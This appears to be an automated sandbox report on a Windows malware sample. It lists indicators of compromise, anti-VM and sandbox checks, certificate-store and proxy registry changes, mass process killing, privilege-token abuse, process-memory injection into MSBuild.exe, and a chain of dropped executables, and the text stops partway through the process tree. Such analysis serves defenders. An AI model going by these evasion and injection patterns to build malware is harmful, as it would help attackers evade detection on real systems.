description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language p3hx1_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7IIl2eE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a752fde56138218f3e1a1f44ac484dcd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1e1e842738.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 261.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language LXUZVRLG.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CamMenuMaker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PQPYAYJJ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 261.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PQPYAYJJ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e7b605131d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 49b1c089fd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Passwords.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 08c15e8fbc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEYKSCXV.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CamMenuMaker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CamMenuMaker.exe -
Checks processor information in registry 2 TTPs 9 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor Updater.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor Updater.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor Updater.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 5272 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Kills process with taskkill 64 IoCs
pid Process 11232 taskkill.exe 2060 taskkill.exe 396 taskkill.exe 696 taskkill.exe 2388 taskkill.exe 11440 taskkill.exe 11620 taskkill.exe 1060 taskkill.exe 5348 taskkill.exe 1248 taskkill.exe 9784 taskkill.exe 2692 taskkill.exe 1564 taskkill.exe 10640 taskkill.exe 3724 taskkill.exe 2560 taskkill.exe 3224 taskkill.exe 10464 taskkill.exe 1312 taskkill.exe 5656 taskkill.exe 11932 taskkill.exe 12060 taskkill.exe 6384 taskkill.exe 2508 taskkill.exe 5296 taskkill.exe 6124 taskkill.exe 6664 taskkill.exe 13220 taskkill.exe 5312 taskkill.exe 4772 taskkill.exe 4296 taskkill.exe 4636 taskkill.exe 4136 taskkill.exe 4296 taskkill.exe 10124 taskkill.exe 11028 taskkill.exe 10808 taskkill.exe 12728 taskkill.exe 3336 taskkill.exe 1408 taskkill.exe 4972 taskkill.exe 4236 taskkill.exe 3804 taskkill.exe 5740 taskkill.exe 10360 taskkill.exe 11828 taskkill.exe 5072 taskkill.exe 4460 taskkill.exe 10204 taskkill.exe 10280 taskkill.exe 12364 taskkill.exe 12500 taskkill.exe 12624 taskkill.exe 13300 taskkill.exe 2884 taskkill.exe 5628 taskkill.exe 3668 taskkill.exe 3508 taskkill.exe 3440 taskkill.exe 9952 taskkill.exe 10032 taskkill.exe 12996 taskkill.exe 3084 taskkill.exe 10724 taskkill.exe -
Modifies data under HKEY_USERS 52 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates Updater.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates Updater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs Updater.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates Updater.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" Updater.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" Updater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ Updater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates Updater.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133880508935666664" chrome.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs Updater.exe -
Modifies registry class 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-814918696-1585701690-3140955116-1000\{13D03431-40E7-4AFD-A044-1C68436CF42B} msedge.exe Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings rapes.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-814918696-1585701690-3140955116-1000\{79E758A0-DE93-4CD3-9A2E-B02A96BDF241} chrome.exe Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings Abspawnhlp.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-814918696-1585701690-3140955116-1000\{0322F98D-56CB-458B-B62D-D4AA15650B68} msedge.exe -
NTFS ADS 1 IoCs
description ioc Process File created C:\C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_3361556648.txt\ cmd.exe -
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2080 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1176 a752fde56138218f3e1a1f44ac484dcd.exe 1176 a752fde56138218f3e1a1f44ac484dcd.exe 4576 rapes.exe 4576 rapes.exe 6108 MSBuild.exe 6108 MSBuild.exe 6108 MSBuild.exe 6108 MSBuild.exe 1620 Abspawnhlp.exe 5376 Abspawnhlp.exe 5376 Abspawnhlp.exe 5376 Abspawnhlp.exe 5376 Abspawnhlp.exe 3228 MSBuild.exe 3228 MSBuild.exe 3228 MSBuild.exe 3228 MSBuild.exe 6120 MSBuild.exe 6120 MSBuild.exe 6120 MSBuild.exe 6120 MSBuild.exe 2432 MSBuild.exe 2432 MSBuild.exe 2432 MSBuild.exe 2432 MSBuild.exe 5004 rapes.exe 5004 rapes.exe 3680 MSBuild.exe 3680 MSBuild.exe 3680 MSBuild.exe 3680 MSBuild.exe 2080 powershell.exe 2080 powershell.exe 2080 powershell.exe 4300 powershell.exe 4300 powershell.exe 4300 powershell.exe 2568 captcha.exe 2568 captcha.exe 2568 captcha.exe 2568 captcha.exe 2568 captcha.exe 2568 captcha.exe 976 powershell.exe 976 powershell.exe 976 powershell.exe 2084 powershell.exe 2084 powershell.exe 2084 powershell.exe 4376 powershell.exe 4376 powershell.exe 4376 powershell.exe 2624 Abspawnhlp.exe 2624 Abspawnhlp.exe 2624 Abspawnhlp.exe 2624 Abspawnhlp.exe 2624 Abspawnhlp.exe 2624 Abspawnhlp.exe 1960 MSBuild.exe 1960 MSBuild.exe 1960 MSBuild.exe 1960 MSBuild.exe 5444 MSBuild.exe 5444 MSBuild.exe -
Suspicious behavior: LoadsDriver 4 IoCs
pid Process 656 Process not Found 656 Process not Found 656 Process not Found 1992 tzutil.exe -
Suspicious behavior: MapViewOfSection 14 IoCs
pid Process 5376 Abspawnhlp.exe 5376 Abspawnhlp.exe 5376 Abspawnhlp.exe 2624 Abspawnhlp.exe 2624 Abspawnhlp.exe 5212 p3hx1_003.exe 5212 p3hx1_003.exe 5212 p3hx1_003.exe 4128 CamMenuMaker.exe 2624 Abspawnhlp.exe 4128 CamMenuMaker.exe 9152 Abspawnhlp.exe 9152 Abspawnhlp.exe 9152 Abspawnhlp.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2080 powershell.exe Token: SeDebugPrivilege 4300 powershell.exe Token: SeDebugPrivilege 5904 tasklist.exe Token: SeDebugPrivilege 4716 tasklist.exe Token: SeDebugPrivilege 976 powershell.exe Token: SeDebugPrivilege 1948 tasklist.exe Token: SeDebugPrivilege 5112 tasklist.exe Token: SeDebugPrivilege 4276 tasklist.exe Token: SeDebugPrivilege 2084 powershell.exe Token: SeIncreaseQuotaPrivilege 2084 powershell.exe Token: SeSecurityPrivilege 2084 powershell.exe Token: SeTakeOwnershipPrivilege 2084 powershell.exe Token: SeLoadDriverPrivilege 2084 powershell.exe Token: SeSystemProfilePrivilege 2084 powershell.exe Token: SeSystemtimePrivilege 2084 powershell.exe Token: SeProfSingleProcessPrivilege 2084 powershell.exe Token: SeIncBasePriorityPrivilege 2084 powershell.exe Token: SeCreatePagefilePrivilege 2084 powershell.exe Token: SeBackupPrivilege 2084 powershell.exe Token: SeRestorePrivilege 2084 powershell.exe Token: SeShutdownPrivilege 2084 powershell.exe Token: SeDebugPrivilege 2084 powershell.exe Token: SeSystemEnvironmentPrivilege 2084 powershell.exe Token: SeRemoteShutdownPrivilege 2084 powershell.exe Token: SeUndockPrivilege 2084 powershell.exe Token: SeManageVolumePrivilege 2084 powershell.exe Token: 33 2084 powershell.exe Token: 34 2084 powershell.exe Token: 35 2084 powershell.exe Token: 36 2084 powershell.exe Token: SeDebugPrivilege 5136 tasklist.exe Token: SeDebugPrivilege 4376 powershell.exe Token: SeDebugPrivilege 5860 tasklist.exe Token: SeDebugPrivilege 1408 tasklist.exe Token: SeDebugPrivilege 1892 tasklist.exe Token: SeDebugPrivilege 2060 taskkill.exe Token: SeDebugPrivilege 3724 taskkill.exe Token: SeDebugPrivilege 2696 tasklist.exe Token: SeDebugPrivilege 4296 taskkill.exe Token: SeDebugPrivilege 1052 taskkill.exe Token: SeDebugPrivilege 2340 tasklist.exe Token: SeDebugPrivilege 736 tasklist.exe Token: SeDebugPrivilege 4236 taskkill.exe Token: SeDebugPrivilege 2884 taskkill.exe Token: SeDebugPrivilege 2644 tasklist.exe Token: SeDebugPrivilege 396 taskkill.exe Token: SeDebugPrivilege 1068 tasklist.exe Token: SeDebugPrivilege 5628 taskkill.exe Token: SeDebugPrivilege 4000 taskkill.exe Token: SeDebugPrivilege 4008 tasklist.exe Token: SeDebugPrivilege 5312 taskkill.exe Token: SeDebugPrivilege 1320 tasklist.exe Token: SeDebugPrivilege 2560 taskkill.exe Token: SeDebugPrivilege 696 taskkill.exe Token: SeDebugPrivilege 1408 taskkill.exe Token: SeDebugPrivilege 2508 taskkill.exe Token: SeDebugPrivilege 1060 taskkill.exe Token: SeDebugPrivilege 4972 taskkill.exe Token: SeDebugPrivilege 3200 taskkill.exe Token: SeDebugPrivilege 2388 taskkill.exe Token: SeDebugPrivilege 1312 taskkill.exe Token: SeDebugPrivilege 2340 taskkill.exe Token: SeDebugPrivilege 3804 taskkill.exe Token: SeDebugPrivilege 4636 taskkill.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 2340 chrome.exe 3776 msedge.exe 7892 Passwords.com 7892 Passwords.com 7892 Passwords.com -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 7892 Passwords.com 7892 Passwords.com 7892 Passwords.com -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1176 wrote to memory of 4576 1176 a752fde56138218f3e1a1f44ac484dcd.exe 89 PID 1176 wrote to memory of 4576 1176 a752fde56138218f3e1a1f44ac484dcd.exe 89 PID 1176 wrote to memory of 4576 1176 a752fde56138218f3e1a1f44ac484dcd.exe 89 PID 4576 wrote to memory of 3264 4576 rapes.exe 95 PID 4576 wrote to memory of 3264 4576 rapes.exe 95 PID 3264 wrote to memory of 6108 3264 XOPPRUc.exe 96 PID 3264 wrote to memory of 6108 3264 XOPPRUc.exe 96 PID 3264 wrote to memory of 6108 3264 XOPPRUc.exe 96 PID 3264 wrote to memory of 6108 3264 XOPPRUc.exe 96 PID 3264 wrote to memory of 6108 3264 XOPPRUc.exe 96 PID 3264 wrote to memory of 6108 3264 XOPPRUc.exe 96 PID 3264 wrote to memory of 6108 3264 XOPPRUc.exe 96 PID 3264 wrote to memory of 6108 3264 XOPPRUc.exe 96 PID 3264 wrote to memory of 6108 3264 XOPPRUc.exe 96 PID 4576 wrote to memory of 3200 4576 rapes.exe 99 PID 4576 wrote to memory of 3200 4576 rapes.exe 99 PID 4576 wrote to memory of 3200 4576 rapes.exe 99 PID 3200 wrote to memory of 1620 3200 PQPYAYJJ.exe 100 PID 3200 wrote to memory of 1620 3200 PQPYAYJJ.exe 100 PID 3200 wrote to memory of 1620 3200 PQPYAYJJ.exe 100 PID 1620 wrote to memory of 5376 1620 Abspawnhlp.exe 101 PID 1620 wrote to memory of 5376 1620 Abspawnhlp.exe 101 PID 1620 wrote to memory of 5376 1620 Abspawnhlp.exe 101 PID 4576 wrote to memory of 5988 4576 rapes.exe 102 PID 4576 wrote to memory of 5988 4576 rapes.exe 102 PID 5988 wrote to memory of 3836 5988 h8NlU62.exe 103 PID 5988 wrote to memory of 3836 5988 h8NlU62.exe 103 PID 5988 wrote to memory of 3836 5988 h8NlU62.exe 103 PID 5988 wrote to memory of 3228 5988 h8NlU62.exe 104 PID 5988 wrote to memory of 3228 5988 h8NlU62.exe 104 PID 5988 wrote to memory of 3228 5988 h8NlU62.exe 104 PID 5988 wrote to memory of 3228 5988 h8NlU62.exe 104 PID 5988 wrote to memory of 3228 5988 h8NlU62.exe 104 PID 5988 wrote to memory of 3228 5988 h8NlU62.exe 104 PID 5988 wrote to memory of 3228 5988 h8NlU62.exe 104 PID 5988 wrote to memory of 3228 5988 h8NlU62.exe 104 PID 5988 wrote to memory of 3228 5988 h8NlU62.exe 104 PID 4576 wrote to memory of 2248 4576 rapes.exe 105 PID 4576 wrote to memory of 2248 4576 rapes.exe 105 PID 2248 wrote to memory of 532 2248 qWR3lUj.exe 106 PID 2248 wrote to memory of 532 2248 qWR3lUj.exe 106 PID 2248 wrote to memory of 532 2248 qWR3lUj.exe 106 PID 2248 wrote to memory of 6120 2248 qWR3lUj.exe 107 PID 2248 wrote to memory of 6120 2248 qWR3lUj.exe 107 PID 2248 wrote to memory of 6120 2248 qWR3lUj.exe 107 PID 2248 wrote to memory of 6120 2248 qWR3lUj.exe 107 PID 2248 wrote to memory of 6120 2248 qWR3lUj.exe 107 PID 2248 wrote to memory of 6120 2248 qWR3lUj.exe 107 PID 2248 wrote to memory of 6120 2248 qWR3lUj.exe 107 PID 2248 wrote to memory of 6120 2248 qWR3lUj.exe 107 PID 2248 wrote to memory of 6120 2248 qWR3lUj.exe 107 PID 5376 wrote to memory of 5184 5376 Abspawnhlp.exe 108 PID 5376 wrote to memory of 5184 5376 Abspawnhlp.exe 108 PID 5376 wrote to memory of 5184 5376 Abspawnhlp.exe 108 PID 5376 wrote to memory of 5184 5376 Abspawnhlp.exe 108 PID 5376 wrote to memory of 5184 5376 Abspawnhlp.exe 108 PID 4576 wrote to memory of 2420 4576 rapes.exe 110 PID 4576 wrote to memory of 2420 4576 rapes.exe 110 PID 2420 wrote to memory of 2432 2420 HAe88WC.exe 111 PID 2420 wrote to memory of 2432 2420 HAe88WC.exe 111 PID 2420 wrote to memory of 2432 2420 HAe88WC.exe 111 PID 2420 wrote to memory of 2432 2420 HAe88WC.exe 111 PID 2420 wrote to memory of 2432 2420 HAe88WC.exe 111 PID 2420 wrote to memory of 2432 2420 HAe88WC.exe 111 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2672
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"2⤵
- System Location Discovery: System Language Discovery
PID:6760
-
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"2⤵
- System Location Discovery: System Language Discovery
PID:6204
-
-
C:\Users\Admin\AppData\Local\Temp\a752fde56138218f3e1a1f44ac484dcd.exe"C:\Users\Admin\AppData\Local\Temp\a752fde56138218f3e1a1f44ac484dcd.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1176 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Users\Admin\AppData\Local\Temp\10398310101\XOPPRUc.exe"C:\Users\Admin\AppData\Local\Temp\10398310101\XOPPRUc.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3264 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6108
-
-
-
C:\Users\Admin\AppData\Local\Temp\10404930101\PQPYAYJJ.exe"C:\Users\Admin\AppData\Local\Temp\10404930101\PQPYAYJJ.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3200 -
C:\Users\Admin\Abspawnhlp.exe"C:\Users\Admin\Abspawnhlp.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exeC:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
